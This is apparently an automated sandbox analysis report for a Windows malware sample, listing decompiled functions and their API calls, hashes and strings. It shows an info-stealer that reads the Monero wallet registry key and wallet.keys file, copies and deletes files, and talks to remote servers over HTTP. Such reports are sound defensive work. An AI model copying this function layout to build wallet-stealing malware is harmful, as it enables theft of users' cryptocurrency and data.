                                                          • Part of subcall function 00B39627: GlobalAlloc.KERNEL32(00000000,00B34644,00B34644), ref: 00B3963A
                                                        • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B3465A
                                                        • GlobalFree.KERNEL32(?), ref: 00B34779
                                                          • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                          • Part of subcall function 00B29D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                          • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                          • Part of subcall function 00B29D27: LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3470A
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B34727
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00B34739
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00B3474C
                                                        • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B3475B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction ID: 24341b310ceeee23cef13cc872ee22afcfe15281c5c347e2a6818ef9eb4ac133
                                                        • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction Fuzzy Hash: 5F7150B6900218BBDB14FBE0DC85FEE77B9AB49300F1085D8B609A6181EB75DB49CB51
                                                        Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00401327
                                                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                          • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                          • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                        • lstrlenA.KERNEL32(?), ref: 0040135C
                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                        • memset.MSVCRT ref: 00401516
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                        • API String ID: 1930502592-218353709
                                                        • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                        • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                        Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                        • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                        • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                        • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                        • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3532888709-1526165396
                                                        • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                        • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                        Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406147
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                        • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                        • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID: a+A$a+A
                                                        • API String ID: 4287319946-2847607090
                                                        • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                        • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                        Function 00B30CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memset.MSVCRT ref: 00B30E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                        • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                        • memset.MSVCRT ref: 00B30F34
                                                        • memset.MSVCRT ref: 00B30F48
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction ID: 078b8227323d7ce072172e9a6f224f058a06a76a9eda6bbfc69caa513aba8b88
                                                        • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction Fuzzy Hash: B181C8B55002186BCB14FBA0DD92FED77B9AF44704F6041E8B34566092EF746B88CF5A
                                                        Function 00B30CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memset.MSVCRT ref: 00B30E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                        • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                        • memset.MSVCRT ref: 00B30F34
                                                        • memset.MSVCRT ref: 00B30F48
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction ID: 179be65b2f9b5934b8b66c3e32d475b3c9dc31cfff57507803a876e3c240b3bf
                                                        • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction Fuzzy Hash: 9861D5B5500218ABCB14EBA0CD86FED77B8AF44704F6041E9F74566092EF702B88CF5A
                                                        Function 00B24AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B24B7C
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B24BA1
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B24D21
                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B2504F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B2506B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B2507F
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B250B0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B25114
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2512C
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B24D7C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B25136
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID:
                                                        • API String ID: 2402878923-0
                                                        • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction ID: 828ff600b8ed1b9be05a2547ea1ef62d3a7b78ea93cf9cc4de2f514b51a24167
                                                        • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction Fuzzy Hash: E712BC72910218ABCB15EB90DD92EEEB7B9AF16701F7051D9B14672091EF702F88CF52
                                                        Function 00B264E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                        • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B26664
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B266D4
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26756
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26760
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2676A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID:
                                                        • API String ID: 3074848878-0
                                                        • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction ID: 4d777138341f61c41cf6df43609235864ae8b5739696a23cef825e035e4c1199
                                                        • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction Fuzzy Hash: 1F714F75A40218ABDB24DFA0DC89BEE77B5FB45700F204199F50A6B190DBB46E84CF42
                                                        Function 00B39277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B392D3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction ID: 5966374d502412c3292cc96ae32d5b4054e6d03e6b401c452cff03511bd92a72
                                                        • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction Fuzzy Hash: 12710AB9A40208ABDB14EFE4DC89FEEB7B9FF49300F108548F515A7294DB74A905CB61
                                                        Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                        • memset.MSVCRT ref: 0041716A
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                        Strings
                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                        • sA, xrefs: 004172AE, 00417179, 0041717C
                                                        • sA, xrefs: 00417111
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                        • API String ID: 224852652-2614523144
                                                        • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                        • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                        • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
